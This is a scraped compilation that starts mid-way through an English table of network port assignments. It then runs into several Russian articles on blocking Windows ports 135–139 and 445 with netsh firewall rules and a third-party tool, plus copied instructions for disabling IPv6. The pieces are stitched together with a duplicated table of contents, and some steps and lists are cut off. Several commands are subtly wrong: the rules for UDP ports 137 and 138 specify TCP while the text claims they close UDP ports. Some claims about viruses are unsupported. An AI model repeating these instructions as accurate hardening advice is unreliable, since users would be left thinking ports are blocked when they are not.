Unofficial Unofficial Sony PlayStation Remote Play Session creation communication port 9296 Unofficial Sony PlayStation Remote Play 9897 Unofficial Sony PlayStation Remote Play Video stream 9300 Unofficial IBM Cognos BI[citation needed] 9303 Unofficial D-Link Shareport Share storage and MFP printers[citation needed] 9306 Yes Sphinx Native API 9309 Unofficial Unofficial Sony PlayStation Vita Host Collaboration WiFi Data Transfer[335] 9312 Yes Sphinx SphinxQL 9332 Unofficial Litecoin JSON-RPC server 9333 Unofficial Litecoin 9339 Unofficial Used by all Supercell games such as Brawl Stars and Clash of Clans, mobile freemium strategy video games 9389 Yes adws, Microsoft AD DS Web Services, Powershell uses this port 9392 Unofficial No OpenVAS Greenbone Security Assistant web interface 9418 Yes git, Git pack transfer service 9419 Unofficial MooseFS distributed file system – master control port[336] 9420 Unofficial MooseFS distributed file system – master command port[336] 9421 Unofficial MooseFS distributed file system – master client port[336] 9422 Unofficial MooseFS distributed file system – Chunkservers[336] 9425 Unofficial MooseFS distributed file system – CGI server[336] 9443 Unofficial VMware Websense Triton console (HTTPS port used for accessing and administrating a vCenter Server via the Web Management Interface) Unofficial NCSA Brown Dog Data Tilling Service 9535 Yes mngsuite, LANDesk Management Suite Remote Control 9536 Yes laes-bf, IP Fabrics Surveillance buffering function 9600 No Unofficial Factory Interface Network Service (FINS), a network protocol used by Omron programmable logic controllers[citation needed] 9669 Unofficial No VGG Image Search Engine VISE 9675 Unofficial Unofficial Spiceworks Desktop, IT Helpdesk Software 9676 Unofficial Unofficial Spiceworks Desktop, IT Helpdesk Software 9695 Yes Content centric networking (CCN, CCNx)[citation needed] 9735 Unofficial Bitcoin Lightning Network[337] 9785 Unofficial Unofficial Viber[206] 9800 Yes WebDAV Source Unofficial WebCT e-learning portal 9875 Unofficial Club Penguin Disney online game for kids 9898 Unofficial Tripwire—File Integrity Monitoring Software[338] 9899 Yes SCTP tunneling (port number used in SCTP packets encapsulated in UDP, RFC 6951) 9901 Unofficial Banana for Apache Solr 9981 Unofficial Tvheadend HTTP server (web interface)[339] 9982 Unofficial Tvheadend HTSP server (Streaming protocol)[339] 9987 Unofficial No TeamSpeak 3 server default (voice) port (for the conflicting service see the IANA list)[340] 9993 Unofficial ZeroTier Default port for ZeroTier 9997 Unofficial Splunk port for communication between the forwarders and indexers 9999 Unofficial Urchin Web Analytics[citation needed] 9999 Unofficial Dash (cryptocurrency)[341] 10000 Yes Network Data Management Protocol (NDMP) Control stream for network backup and restore. Unofficial BackupExec Unofficial Webmin, Web-based Unix/Linux system administration tool (default port) 10000–20000 No Unofficial Used on VoIP networks for receiving and transmitting voice telephony traffic which includes Google Voice via the OBiTalk ATA devices as well as on the MagicJack and Vonage ATA network devices.[342] 10001 Unofficial Ubiquiti UniFi access points broadcast to 255.255.255.255:10001 (UDP) to locate the controller(s) 10009 Unofficial Unofficial Crossfire, a multiplayer online First Person Shooter[citation needed] 10011 Unofficial No TeamSpeak 3 ServerQuery[340] 10022 Unofficial No TeamSpeak 3 ServerQuery over SSH 10024 Unofficial Zimbra smtp [mta]—to amavis from postfix[citation needed] 10025 Unofficial Zimbra smtp [mta]—back to postfix from amavis[citation needed] 10042 Unofficial Mathoid server [343] 10050 Yes Zabbix agent 10051 Yes Zabbix trapper 10110 Yes NMEA 0183 Navigational Data. Transport of NMEA 0183 sentences over TCP or UDP 10172 Unofficial Intuit Quickbooks client 10200 Unofficial FRISK Software International’s fpscand virus scanning daemon for Unix platforms[344] Unofficial FRISK Software International’s f-protd virus scanning daemon for Unix platforms[345] 10201–10204 Unofficial FRISK Software International’s f-protd virus scanning daemon for Unix platforms[345] 10212 Yes GE Intelligent Platforms Proficy HMI/SCADA – CIMPLICITY WebView[346] 10308 Unofficial Digital Combat Simulator Dedicated Server [347] 10468 Unofficial Flyer — discovery protocol[citation needed] 10480 Unofficial SWAT 4 Dedicated Server[citation needed] 10505 Unofficial BlueStacks (android simulator) broadcast[348] 10514 Unofficial Unofficial TLS-enabled Rsyslog (default by convention) 10578 Unofficial No Skyrim Together multiplayer server for The Elder Scrolls V: Skyrim mod. 10800 Unofficial Touhou fight games (Immaterial and Missing Power, Scarlet Weather Rhapsody, Hisoutensoku, Hopeless Masquerade and Urban Legend in Limbo) 10823 Unofficial Farming Simulator 2011[citation needed] 10891 Unofficial Jungle Disk (this port is opened by the Jungle Disk Monitor service on the localhost)[citation needed] 10933 Yes No Octopus Deploy Tentacle deployment agent[349] 11001 Yes metasys ( Johnson Controls Metasys java AC control environment ) 11100 No Unofficial Risk of Rain multiplayer server 11111 Unofficial RiCcI, Remote Configuration Interface (Redhat Linux) 11112 Yes ACR/NEMA Digital Imaging and Communications in Medicine (DICOM) 11211 Unofficial Unofficial memcached[11] 11214 Unofficial Unofficial memcached incoming SSL proxy 11215 Unofficial Unofficial memcached internal outgoing SSL proxy 11235 Yes XCOMPUTE numerical systems messaging (Xplicit Computing)[350] 11311 Unofficial Unofficial Robot Operating System master 11371 Yes OpenPGP HTTP key server 11753 Unofficial OpenRCT2 multiplayer[351] 12000 Unofficial Unofficial CubeForm, Multiplayer SandBox Game 12012 Unofficial Audition Online Dance Battle, Korea Server—Status/Version Check 12013 Unofficial Unofficial Audition Online Dance Battle, Korea Server 12035 Unofficial Second Life, used for server UDP in-bound[352] 12043 Unofficial Second Life, used for LSL HTTPS in-bound[353] 12046 Unofficial Second Life, used for LSL HTTP in-bound[353] 12201 Unofficial Unofficial Graylog Extended Log Format (GELF)[354][importance?] 12222 Yes Light Weight Access Point Protocol (LWAPP) LWAPP data (RFC 5412) 12223 Yes Light Weight Access Point Protocol (LWAPP) LWAPP control (RFC 5412) 12307 Unofficial Makerbot UDP Broadcast (client to printer) (JSON-RPC)[355] 12308 Unofficial Makerbot UDP Broadcast (printer to client) (JSON-RPC)[355] 12345 Unofficial Unofficial Cube World[356] Unofficial Little Fighter 2 Unofficial NetBus remote administration tool (often Trojan horse). 12443 Unofficial IBM HMC web browser management access over HTTPS instead of default port 443[357] 12489 Unofficial NSClient/NSClient++/NC_Net (Nagios) 12975 Unofficial LogMeIn Hamachi (VPN tunnel software; also port 32976)—used to connect to Mediation Server (bibi.hamachi.cc); will attempt to use SSL (TCP port 443) if both 12975 & 32976 fail to connect 13000–13050 Unofficial Second Life, used for server UDP in-bound[358] 13008 Unofficial Unofficial Crossfire, a multiplayer online First Person Shooter[citation needed] 13075 Yes Default[359] for BMC Software Control-M/Enterprise Manager Corba communication, though often changed during installation 13400 Yes ISO 13400 Road vehicles — Diagnostic communication over Internet Protocol(DoIP) 13720 Yes Symantec NetBackup—bprd (formerly VERITAS) 13721 Yes Symantec NetBackup—bpdbm (formerly VERITAS) 13724 Yes Symantec Network Utility—vnetd (formerly VERITAS) 13782 Yes Symantec NetBackup—bpcd (formerly VERITAS) 13783 Yes Symantec VOPIED protocol (formerly VERITAS) 13785 Yes Symantec NetBackup Database—nbdb (formerly VERITAS) 13786 Yes Symantec nomdb (formerly VERITAS) 14550 Unofficial MAVLink Ground Station Port 14567 Unofficial Battlefield 1942 and mods 14652 Unofficial Repgen DoxBox reporting tool 14800 Unofficial Age of Wonders III p2p port[360] 15000 Unofficial psyBNC Unofficial Wesnoth Unofficial Kaspersky Network Agent[361] Unofficial Teltonika networks remote management system (RMS) 15009 Unofficial Unofficial Teltonika networks remote management system (RMS) 15010 Unofficial Unofficial Teltonika networks remote management system (RMS) 15441 Unofficial ZeroNet fileserver[citation needed] 15567 Unofficial Battlefield Vietnam and mods 15345 Yes XPilot Contact 15672 Unofficial No RabbitMQ management plugin[362] 16000 Unofficial Oracle WebCenter Content: Imaging (formerly known as Oracle Universal Content Management). Port though often changed during installation Unofficial shroudBNC 16080 Unofficial macOS Server Web (HTTP) service with performance cache[363] 16200 Unofficial Oracle WebCenter Content: Content Server (formerly known as Oracle Universal Content Management). Port though often changed during installation 16225 Unofficial Oracle WebCenter Content: Content Server Web UI. Port though often changed during installation 16250 Unofficial Oracle WebCenter Content: Inbound Refinery (formerly known as Oracle Universal Content Management). Port though often changed during installation 16261 Unofficial Unofficial Project Zomboid multiplayer. Additional sequential ports used for each player connecting to server.[citation needed] 16300 Unofficial Oracle WebCenter Content: Records Management (formerly known as Oracle Universal Records Management). Port though often changed during installation 16384 Unofficial CISCO Default RTP MIN 16384–16403 Unofficial Real-time Transport Protocol (RTP), RTP Control Protocol (RTCP), used by Apple’s iChat for audio and video[11] 16384–16387 Unofficial Real-time Transport Protocol (RTP), RTP Control Protocol (RTCP), used by Apple’s FaceTime and Game Center[11] 16393–16402 Unofficial Real-time Transport Protocol (RTP), RTP Control Protocol (RTCP), used by Apple’s FaceTime and Game Center[11] 16403–16472 Unofficial Real-time Transport Protocol (RTP), RTP Control Protocol (RTCP), used by Apple’s Game Center[11] 16400 Unofficial Oracle WebCenter Content: Capture (formerly known as Oracle Document Capture). Port though often changed during installation 16567 Unofficial Battlefield 2 and mods 16666 Unofficial Unofficial SITC Port for mobile web traffic 16677 Unofficial Unofficial SITC Port for mobile web traffic 17000 Unofficial M17 — Digital RF voice and data protocol with Internet (UDP) gateways (reflectors).[364] 17011 Unofficial Worms multiplayer 17224 Yes Train Realtime Data Protocol (TRDP) Process Data, network protocol used in train communication.[2][365] 17225 Yes Train Realtime Data Protocol (TRDP) Message Data, network protocol used in train communication.[2][366] 17333 Unofficial CS Server (CSMS), default binary protocol port 17472 Yes Tanium Communication Port 17474 Unofficial DMXControl 3 Network Discovery 17475 Unofficial Unofficial DMXControl 3 Network Broker 17500 Yes Dropbox LanSync Protocol (db-lsp); used to synchronize file catalogs between Dropbox clients on a local network. 17777 Unofficial Unofficial SITC Port for mobile web traffic 18080 Unofficial No Monero P2P network communications[citation needed] 18081 Unofficial No Monero incoming RPC calls[citation needed] 18091 Unofficial Unofficial memcached Internal REST HTTPS for SSL 18092 Unofficial Unofficial memcached Internal CAPI HTTPS for SSL 18104 Yes RAD PDF Service 18200 Unofficial Unofficial Audition Online Dance Battle, AsiaSoft Thailand Server status/version check 18201 Unofficial Unofficial Audition Online Dance Battle, AsiaSoft Thailand Server 18206 Unofficial Unofficial Audition Online Dance Battle, AsiaSoft Thailand Server FAM database 18300 Unofficial Unofficial Audition Online Dance Battle, AsiaSoft SEA Server status/version check 18301 Unofficial Unofficial Audition Online Dance Battle, AsiaSoft SEA Server 18306 Unofficial Unofficial Audition Online Dance Battle, AsiaSoft SEA Server FAM database 18333 Unofficial Bitcoin testnet[303] 18400 Unofficial Unofficial Audition Online Dance Battle, KAIZEN Brazil Server status/version check 18401 Unofficial Unofficial Audition Online Dance Battle, KAIZEN Brazil Server 18505 Unofficial Unofficial Audition Online Dance Battle R4p3 Server, Nexon Server status/version check 18506 Unofficial Unofficial Audition Online Dance Battle, Nexon Server 18605 Unofficial Unofficial X-BEAT status/version check 18606 Unofficial Unofficial X-BEAT 18676 Unofficial Unofficial YouView 19000 Unofficial Unofficial Audition Online Dance Battle, G10/alaplaya Server status/version check Unofficial JACK sound server 19001 Unofficial Unofficial Audition Online Dance Battle, G10/alaplaya Server 19132 Unofficial Minecraft: Bedrock Edition multiplayer server[367] 19133 Unofficial Minecraft: Bedrock Edition IPv6 multiplayer server[367] 19150 Unofficial Unofficial Gkrellm Server 19226 Unofficial Panda Software AdminSecure Communication Agent 19294 Unofficial Google Talk Voice and Video connections[368] 19295 Unofficial Google Talk Voice and Video connections[368] 19302 Unofficial Google Talk Voice and Video connections[368] 19531 Unofficial No systemd-journal-gatewayd[369] 19532 Unofficial No systemd-journal-remote[370] 19788 No Yes Mesh Link Establishment protocol for IEEE 802.15.4 radio mesh networks[371] 19812 Yes No 4D database SQL Communication[372] 19813 Yes 4D database Client Server Communication[372] 19814 Yes 4D database DB4D Communication[372] 19999 Yes Distributed Network Protocol—Secure (DNP—Secure), a secure version of the protocol used in SCADA systems between communicating RTU’s and IED’s 20000 Yes Distributed Network Protocol (DNP), a protocol used in SCADA systems between communicating RTU’s and IED’s Yes OpenWebNet, communications protocol used in Bticino products Unofficial Usermin, Web-based Unix/Linux user administration tool (default port) Unofficial Used on VoIP networks for receiving and transmitting voice telephony traffic which includes Google Voice via the OBiTalk ATA devices as well as on the MagicJack and Vonage ATA network devices.[342] 20560 Unofficial Unofficial Killing Floor 20582 Unofficial HW Development IoT comms 20583 Unofficial HW Development IoT comms 20595 Unofficial 0 A.D. Empires Ascendant 20808 Unofficial Ableton Link 21025 Unofficial Starbound Server (default), Starbound 21064 Unofficial Default Ingres DBMS server 22000 Unofficial Syncthing (default) 22136 Unofficial FLIR Systems Camera Resource Protocol 22222 Unofficial Davis Instruments, WeatherLink IP 23073 Unofficial Soldat Dedicated Server 23399 Unofficial Skype default protocol 23513 Unofficial Duke Nukem 3D source ports 24441 Unofficial Unofficial Pyzor spam detection network 24444 Unofficial NetBeans integrated development environment 24465 Yes Tonido Directory Server for Tonido which is a Personal Web App and P2P platform 24554 Yes BINKP, Fidonet mail transfers over TCP/IP 24800 Unofficial Synergy: keyboard/mouse sharing software 24842 Unofficial StepMania: Online: Dance Dance Revolution Simulator 25565 Unofficial Minecraft (Java Edition) multiplayer server[373][374] Unofficial Minecraft (Java Edition) multiplayer server query[375] 25575 Unofficial Minecraft (Java Edition) multiplayer server RCON[376] 25600-25700 Unofficial Unofficial SamsidParty Operational Ports 25734-25735 Unofficial Unofficial SOLIDWORKS SolidNetworkLicense Manager[377] 25826 Unofficial collectd default port[378] 26000 Yes Yes id Software’s Quake server Unofficial EVE Online Unofficial Xonotic, an open-source arena shooter 26822 Unofficial MSI MysticLight 26900–26901 Unofficial EVE Online 26909–26911 Unofficial Action Tanks Online 27000 Unofficial PowerBuilder SySAM license server 27000–27006 Unofficial id Software’s QuakeWorld master server 27000–27009 Yes Yes FlexNet Publisher’s License server (from the range of default ports) 27000–27015 No Unofficial Steam (game client traffic)[379] 27015 No Unofficial GoldSrc and Source engine dedicated server port[379] 27015–27018 Unofficial Unturned, a survival game 27015–27030 No Unofficial Steam (matchmaking and HLTV)[379] Unofficial Unofficial Steam (downloads)[379] 27016 Unofficial Magicka and Space Engineers server port 27017 Unofficial No MongoDB daemon process (mongod) and routing service (mongos)[380] 27031–27035 No Unofficial Steam (In-Home Streaming)[379] 27036 Unofficial Unofficial Steam (In-Home Streaming)[379] 27374 Unofficial Sub7 default. 27500–27900 Unofficial id Software’s QuakeWorld 27888 Unofficial Kaillera server 27901–27910 Unofficial id Software’s Quake II master server 27950 Unofficial OpenArena outgoing 27960–27969 Unofficial Activision’s Enemy Territory and id Software’s Quake III Arena, Quake III and Quake Live and some ioquake3 derived games, such as Urban Terror (OpenArena incoming) 28000 Yes Yes Siemens Digital Industries Software license server[2] 28001 Unofficial Starsiege: Tribes[citation needed] 28015 Unofficial Rust (video game)[381] 28016 Unofficial Rust (video game) RCON[382] 28260 Unofficial Palo Alto Networks’ Panorama HA-1 backup unencrypted sync port.[26] 28443 Unofficial Palo Alto Networks’ Panorama-to-managed devices software updates, PAN-OS 8.0 and later.[197] 28769 Unofficial Palo Alto Networks’ Panorama HA unencrypted sync port.[26] 28770 Unofficial Palo Alto Networks’ Panorama HA-1 backup sync port.[26] 28770–28771 Unofficial AssaultCube Reloaded, a video game based upon a modification of AssaultCube[citation needed] 28785–28786 Unofficial Cube 2: Sauerbraten[383] 28852 Unofficial Unofficial Killing Floor[citation needed] 28910 Unofficial Unofficial Nintendo Wi-Fi Connection[384] 28960 Unofficial Unofficial Call of Duty; Call of Duty: United Offensive; Call of Duty 2; Call of Duty 4: Modern Warfare[citation needed] Call of Duty: World at War (PC platform)[385] 29000 Unofficial Perfect World, an adventure and fantasy MMORPG[citation needed] 29070 Unofficial Unofficial Jedi Knight: Jedi Academy by Ravensoft[citation needed] 29900–29901 Unofficial Unofficial Nintendo Wi-Fi Connection[384] 29920 Unofficial Unofficial Nintendo Wi-Fi Connection[384] 30000 Unofficial XLink Kai P2P Unofficial Minetest server default port[386] Unofficial Foundry Virtual Tabletop server default port[387] 30033 Unofficial No TeamSpeak 3 File Transfer[340] 30120 Unofficial Fivem (Default Port) GTA V multiplayer[388][374] 30564 Unofficial Multiplicity: keyboard/mouse/clipboard sharing software[citation needed] 31337 Unofficial Back Orifice and Back Orifice 2000 remote administration tools[389][390] Unofficial Unofficial ncat, a netcat alternative[391] 31416 Unofficial BOINC RPC[392] 31438 Unofficial Rocket U2[393] 31457 Yes TetriNET 32137 Unofficial Unofficial Immunet Protect (UDP in version 2.0,[394] TCP since version 3.0[395]) 32400 Yes Plex Media Server[396] 32764 Unofficial A backdoor found on certain Linksys, Netgear and other wireless DSL modems/combination routers[397] 32887 Unofficial Ace of Spades, a multiplayer FPS video game[citation needed] 32976 Unofficial LogMeIn Hamachi, a VPN application; also TCP port 12975 and SSL (TCP 443).[398] 33434 Yes Yes traceroute 33848 Unofficial Jenkins, a continuous integration (CI) tool[399][400] 34000 Unofficial Infestation: Survivor Stories (formerly known as The War Z), a multiplayer zombie video game[verification needed] 34197 No Unofficial Factorio, a multiplayer survival and factory-building game[401] 35357 Yes OpenStack Identity (Keystone) administration[402][self-published source?] 36330 Unofficial Folding@home Control Port 37008 Unofficial TZSP intrusion detection[citation needed] 40000 Yes Yes SafetyNET p – a real-time Industrial Ethernet protocol 41121 Yes Yes Tentacle Server[403] — Pandora FMS 41794 Yes Yes Crestron Control Port[404] — Crestron Electronics 41795 Yes Yes Crestron Terminal Port[405] — Crestron Electronics 41796 Yes No Crestron Secure Control Port[406] — Crestron Electronics 41797 Yes No Crestron Secure Terminal Port[407] — Crestron Electronics 42081-42090 Yes Yes Zippin — Zippin Stores 42590-42595 Yes Yes Glue — MakePro X 42806 Discord[408] 42999 Yes Curiosity [409] 43110 Unofficial ZeroNet web UI default port [410] 43594–43595 Unofficial RuneScape[411] 44405 Unofficial Mu Online Connect Server[citation needed] 44818 Yes Yes EtherNet/IP explicit messaging 47808–47823 Yes Yes BACnet Building Automation and Control Networks (4780810 = BAC016 to 4782310 = BACF16) 48556 Yes Yes drive.web AC/DC Drive Automation and Control Networks [412] 49151 Reserved Reserved Reserved[2]

В мире чуть ли не каждый день десятки компьютеров заражаются опасными вирусами, и всё больше пользователей начинают искать способы повышения безопасности своего персонального компьютера.

Наиболее часто заражаются ПК под управлением операционной системы Windows. Связано это с тем, что большинство вирусов проникают в ОС через определенные входящие подключения, так называемые «порты», которые, к сожалению, являются включёнными по умолчанию.

Несколько упрощая, понятие «порт» можно определить как номер входящего подключения внешних программ (в том числе и вирусов) к вашему компьютеру через IP-сеть. Каждому порту присваивается уникальный номер для определения единственно возможного получателя данных в операционной системе.

Проникнув в компьютер, вирусы начинают заражать данные пользователя и открывают все ранее закрытые порты Виндовс для более быстрого распространения по системе. Чтобы этого не произошло, необходимо блокировать самые уязвимые порты, тем самым предотвратив возможность заражения и подняв безопасность Windows на уровень выше.

Самые уязвимые порты Windows 7 – 10

Исследование самых крупных вирусных взломов показывает, что 80% паразитного трафика проходит через 4 порта, используемые для обмена данными между разными версиями ОС Виндовс. Наиболее уязвимыми открытыми портами Windows считаются:

TCP порт 445 (он используется для обмена файлами)
TCP порт 139 (предназначен для удаленного подключения к компьютеру)
UDP порт 137 (служит для поиска информации на других компьютерах)
TCP порт 135 (через него выполняются задания команд)

Как проверить, какие порты открыты

Чтобы узнать, есть ли на вашем устройстве отрытые уязвимые порты, воспользуйтесь сканером портов от Whoer.net. Определив ваш IP-адрес и используя nmap, сервис проверки открытых портов покажет, какие порты открыты на вашем устройстве и какие программы их используют. Вы получите взгляд извне, чтобы ясно представлять, насколько ваше устройство уязвимо и открыто опасностям большого Интернета.

scanner port

Как закрыть порты с 135 по 139 и 445 в Windows?

Есть множество вариантов закрытия портов Виндовс, но в статье мы рассмотрим самые простые способы это сделать.

Способ 1 – использование командной строки

Командная строка Windows используется для задания значений тем настройкам системы, у которых нет графического интерфейса. К таковым функциям и относятся рассматриваемые открытые порты подключений.

Командная строка запускается в несколько этапов:

Нажмите сочетание клавиш Win+R
В появившемся окне выполнения команд наберите CMD
Нажмите «ОК»

Использование командной строки

Перед вами появится окно с черным фоном. По очереди скопируйте в него представленные ниже строчки и нажмите клавишу ввода:

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=“Block1_TCP-135”

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=“Block1_TCP-137”

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=“Block1_TCP-138”

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=“Block_TCP-139” (команда помогает закрыть порт 139)

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=“Block_TCP-445” (команда помогает закрыть порт 445)

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=“Block_TCP-5000”

Скопируйте в него представленные строчки и нажмите клавишу ввода

Эти шесть команд закрывают 4 перечисленных выше самых опасных открытых порта Windows, а также порт 5000, отвечающий за обнаружение открытых сервисов, и UDP порт 138 разрешения имен NetBIOS.

Способ 2 – использование сторонних программ

Чтобы не использовать ручную работу с командной строкой, можно использовать стороннее программное обеспечение. Суть его работы сводится к такой же правке реестра, как в способе выше, только в визуальном отображении.

Рекомендуем к использованию Windows Doors Cleaner, которая легко может закрыть порты на компьютере (в Windows 10 – 7: старые версии ОС данная программа не поддерживает).

Инструкция по работе с программой, закрывающей порты

  1. Скачайте и установите программу
  2. Установленную программу необходимо запустить с правами администратора
  3. В появившемся окне при нажатии кнопок «Сlose» или «Disable» отключаются и закрываются все уязвимые порты Windows

Инструкция по работе с программой, закрывающей порты

  1. После внесения необходимых изменений, перезагрузите Windows

Важно отметить, что с помощью этой программы можно не только закрыть, но и открыть порты.

Заключение

Помимо закрытия самых опасных сетевых портов компьютера необходимо не забывать, что этими действиями не достигается максимальная безопасность для операционной системы.

На вашей Windows необходимо устанавливать присылаемые Microsoft критические пакеты обновлений, антивирусные программы, безопасные браузеры и другое ПО, повышающее безопасность и анонимность.

Предлагаем обсудить в комментариях тему защиты сетевых портов и делиться полезными методами повышения конфиденциальности. Не забудьте отправить ссылку на эту статью вашим друзьям, чтобы они тоже знали, как закрыть открытые порты Windows.

Посмотрите также наше видео, где мы более подробно рассказываем о том, как закрыть уязвимые порты:

Содержание

  1. УДАЛЁНКА.РУ
  2. Компьютерная помощь на расстоянии!
  3. Закрытие портов в Windows 7 и выше.
  4. Как закрыть порты 135-139, 445 в Windows?
  5. Способ 1 — Windows Doors Cleaner
  6. Способ 2 — командная строка (скрипт)
  7. Основы сетевых портов. Как закрыть порты Windows Как закрыть порт 135 на виндовс 7
  8. Блокирование сетевых приложений
  9. Сканирование портов
  10. Хост-сканирование
  11. Аудит журнала брандмауэра
  12. Объединение компонентов
  13. Настройка сетевого анализатора
  14. Первоначальный анализ
  15. За что отвечают порты 445 и 139 в ОС Windows
  16. Чем опасны открытые порты
  17. Выясняем, открыты ли порты
  18. Как закрыть порты в Windows 10/8/7
  19. Закрываем порты через брандмауэр
  20. Закрываем порты через командную строку
  21. Закрываем порты через реестр Windows
  22. Как закрыть порты Windows
  23. Какие порты у Windows 7-10 самые уязвимые?
  24. Закрываем порты 135-139 и 445 в Виндовс
  25. Используем командную строку
  26. Закрываем порты сторонними программами
  27. Как работать с программой, закрывающей порты
  28. Делаем выводы
  29. Как закрыть порт 135 windows 7
  30. Как закрыть или открыть порты в windows
  31. Проблема
  32. Алгоритм
  33. Пример
  34. Задача 2 из консоли
  35. UPDATE
  36. Похожие записи
  37. Как закрыть порты, блокируем протоколы
  38. Как закрыть порты?
  39. Как можно закрыть порты?
  40. Закрываем порты и блокируем протоколы
  41. Самые уязвимые порты Windows 7 – 10
  42. Как закрыть порты с 135 по 139 и 445 в Windows?
  43. Способ 1 – использование командной строки
  44. Способ 2 – использование сторонних программ
  45. Инструкция по работе с программой, закрывающей порты
  46. Заключение
  47. Как закрыть порты 135-139, 445 в Windows?
  48. Способ 1 — Windows Doors Cleaner
  49. Способ 2 — командная строка (скрипт)
  50. Какие порты у Windows 7-10 самые уязвимые?
  51. Закрываем порты 135-139 и 445 в Виндовс
  52. Используем командную строку
  53. Закрываем порты сторонними программами
  54. Как работать с программой, закрывающей порты
  55. Делаем выводы
  56. За что отвечают порты 445 и 139 в ОС Windows
  57. Чем опасны открытые порты
  58. Выясняем, открыты ли порты
  59. Как закрыть порты в Windows 10/8/7
  60. Закрываем порты через брандмауэр
  61. Закрываем порты через командную строку
  62. Закрываем порты через реестр Windows
  63. Какие порты у Windows 7-10 самые уязвимые?
  64. Закрываем порты 135-139 и 445 в Виндовс
  65. Используем командную строку
  66. Закрываем порты сторонними программами
  67. Как работать с программой, закрывающей порты
  68. Делаем выводы

УДАЛЁНКА.РУ

Компьютерная помощь на расстоянии!

Закрытие портов в Windows 7 и выше.

cropped cropped 8Нашумевший в СМИ и оставивший немало пользователей без данных шифровальщик WannaCry проникает на компьютер только если соблюдены следующие условия:

Если хотя бы одно из этих условий не выполнено, троянец не сможет проникнуть на компьютер.

Давайте посмотрим, как закрыть порты.

Определить, какие порты не нужны, в общем случае невозможно. Рассмотрим лишь некоторые, обычно не требующиеся на ПК, не объединенных в сеть.

Порт Описание
135 MSRPC (Microsoft RPC). Порт используется в сетевых приложениях Microsoft. Если ваш почтовый клиент не работает с почтовым сервером Exchange, вполне возможно, он вам не нужен.
137 NETBIOS-NS (NetBIOS Name Service)
138 NETBIOS-DGM (NetBIOS Datagram Service)
139 NETBIOS-SSN (NetBIOS Session Service)
445 MICROSOFT-DS — используется в Microsoft Windows 2000 и более поздних версиях для прямого TCP/IP-доступа без использования NetBIOS (например, в Active Directory)

Имеется несколько способов закрыть ненужный порт.

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=”Block_TCP-135″

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=”Block_TCP-137″

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=”Block_TCP-138″

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=”Block_TCP-139″

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=”Block_TCP-5000″

Источник

С последними событиями в мире, когда почти каждый месяц сотни компьютеров заражаются новыми вирусами, очередной раз стоит подумать как обезопасить свой Windows ПК.

Большинство вирусов задействуют только определенные порты в компьютерных сетях, через которые и происходит заражение компьютера, чтобы этого не произошло необходимо их закрыть, тем самым мы закрываем очередную лазейку для хакеров и поднимаем безопасность Windows на уровень выше.

Не стоит также забывать, что помимо закрытия опасных сетевых портов, необходимо позаботиться о том, что бы на вашем Windows ПК или ноутбуке устанавливались пакеты обновления, а также был установлена и постоянно обновлялась антивирусная программа.

Как закрыть порты 135-139, 445 в Windows?

Ниже мы предложим два самых простых способа закрыть сетевые порты в Windows от различных вирусов и уязвимостей.

Способ 1 — Windows Doors Cleaner

С помощью простой программы Windows Doors Cleaner, можно легко закрыть все необходимые порты. Далее мы расскажем как ей воспользоваться:

Способ 2 — командная строка (скрипт)

Если вы не хотите скачивать каких либо программ, тогда можно заблокировать все порты из командой строки:

Если не хотите писать вручную, то можете воспользоваться скриптом, запустив его от имени администратора.

Остались еще вопросы? Пишите их в комментариях, рассказывайте, что у вас получилось или наоборот!

Вот и все! Больше статей и инструкций читайте в разделе Статьи и Хаки Android. Оставайтесь вместе с сайтом Android +1, дальше будет еще интересней!

Источник

Основы сетевых портов. Как закрыть порты Windows Как закрыть порт 135 на виндовс 7

Правила у вас вроде бы прописаны и должны работать.

И не забудьте о том, что ещё надо будет проверить IPv6, т.к. он у вас в системе включен, а вот сканеры обычно проверяют только IPv4 (я про централизованные сервисы).

Если данный протокол вам вообще не нужен, тогда его можно отключить:

Чтобы отключить компоненты IP версии 6 в Windows Vista, выполните указанные ниже действия.

1. Нажмите кнопку Пуск, введите regedit в поле Начать поиск, затем выберите regedit.exe в списке Программы.

2. В диалоговом окне Контроль учетных записей пользователей нажмите кнопку Продолжить.

3. Найдите и выберите следующий подраздел реестра:

4. Дважды щелкните пункт DisabledComponents для изменения параметра DisabledComponents.

Примечание. Если параметр DisabledComponents недоступен, его необходимо создать. Для этого выполните указанные ниже действия.

2. Введите DisabledComponents и нажмите клавишу ВВОД.

3. Дважды щелкните пункт DisabledComponents.

5. Введите любое из указанных ниже значений для настройки протокола IP версии 6, а затем нажмите кнопку ОК.

1. Введите 0, чтобы включить все компоненты IP версии 6.

Примечание. Значение «0» используется по умолчанию.

2. Введите 0xffffffff, чтобы отключить все компоненты IP версии 6, кроме интерфейса замыкания на себя. При этом значении Windows Vista также будет использовать в политиках префиксов протокол IP версии 4 вместо IPv6.

3. Введите 0x20, чтобы использовать в политиках префикса IP версии 4 вместо IP версии 6.

4. Введите 0x10, чтобы отключить собственные интерфейсы IP версии 6.

5. Введите 0x01, чтобы отключить все туннельные интерфейсы IP версии 6.

6. Введите 0x11, чтобы отключить все интерфейсы IP версии 6, кроме интерфейса замыкания на себя.

* Использования других значений (кроме 0x0 или 0x20) может вызвать сбой в работе службы маршрутизации и удаленного доступа.

* Чтобы изменения вступили в силу, необходимо перезагрузить компьютер.

Информация в данной статье относится к следующим продуктам.

* Windows Vista Enterprise

* Windows Vista Enterprise 64-bit edition

* Windows Vista Home Basic 64-bit edition

* Windows Vista Home Premium 64-bit edition

* Windows Vista Ultimate 64-bit edition

* Windows Vista Business

* Windows Vista Business 64-bit edition

* Windows Vista Home Basic

* Windows Vista Home Premium

* Windows Vista Starter

* Windows Vista Ultimate

* Windows 7 Enterprise

* Windows 7 Home Basic

* Windows 7 Home Premium

* Windows 7 Professional

* Windows 7 Ultimate

* Windows Server 2008 R2 Enterprise

* Windows Server 2008 R2 Standard

* Windows Server 2008 Datacenter

* Windows Server 2008 Enterprise

* Windows Server 2008 Standard

